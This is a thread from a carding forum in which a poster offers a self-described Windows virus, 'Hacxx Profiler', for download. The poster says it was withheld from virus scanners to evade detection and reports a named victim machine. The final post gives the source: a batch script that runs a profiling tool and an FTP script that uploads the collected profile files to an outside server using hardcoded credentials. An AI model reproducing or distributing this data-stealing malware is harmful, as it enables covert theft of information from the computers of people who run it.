BPC Squad Bank Paypal And Cards | Carders Forum | Carding Forum
Hacxx Profiler - Computer profile virus - Printable Version

+- BPC Squad Bank Paypal And Cards | Carders Forum | Carding Forum (https://www.bpcforums.biz)
+-- Forum: Anonymity (https://www.bpcforums.biz/Forum-anonymity)
+--- Forum: Hacking and Security (https://www.bpcforums.biz/Forum-hacking-and-security)
+--- Thread: Hacxx Profiler - Computer profile virus (/Thread-hacxx-profiler-computer-profile-virus)



Hacxx Profiler - Computer profile virus - cjpeg - 10-29-2019

Hacxx Profiler is a windows virus that i have developed that creates a text file with the profile for the machine and upload by ftp to a protected server.

The user can view and download all the logs created with this program by visiting the server.
Code:
http://uploaded.net
Username: 16834486
Password: i3e6by88

Download:
http://ul.to/29vhjp3q/Hacxx_Profiler.zip

Virus Scan:
This file was not send to avoid further detection

Note:
  • PM Me if you want the source code.
  • The file only runs if extracted and executed outside the zip file on a Windows machine.



RE: Hacxx Profiler - Computer profile virus - cjpeg - 10-31-2019

1 computer executed the program

Computer: DAVID-PC
User: David

Download Research
http://ul.to/tmjnsel7


RE: Hacxx Profiler - Computer profile virus - cjpeg - 11-17-2019

Hacxx Profiler [Source code]

ftp.bat
Code:
@ftp -i -s:"%~f0"&GOTO:EOF
open ftp.uploaded.net
16834486
i3e6by88
binary
put "c:\windows\temp\*.txt"
disconnect
bye

main.bat
Code:
@ECHO OFF
REM  QBFC Project Options Begin
REM  HasVersionInfo: Yes
REM  Companyname: Microtech, LLC
REM  Productname: Hacxx Profiler
REM  Filedescription:
REM  Copyrights:
REM  Trademarks:
REM  Originalname:
REM  Comments:
REM  Productversion:  1. 0. 0. 0
REM  Fileversion:  1. 0. 0. 0
REM  Internalname:
REM  Appicon: Profile.ico
REM  AdministratorManifest: No
REM  Embeddedfile: PTProfiler.exe
REM  Embeddedfile: ftp.bat
REM  QBFC Project Options End
@ECHO ON
%MYFILES%\PTProfiler.exe /save c:\windows\temp\%userdomain%-%username%-profile.txt
%MYFILES%\ftp.bat

Profile.ico
PTProfiler.exe

Download:
https://uploadrar.com/zti8hq36m34w/Hacxx_Profiler_-_source.rar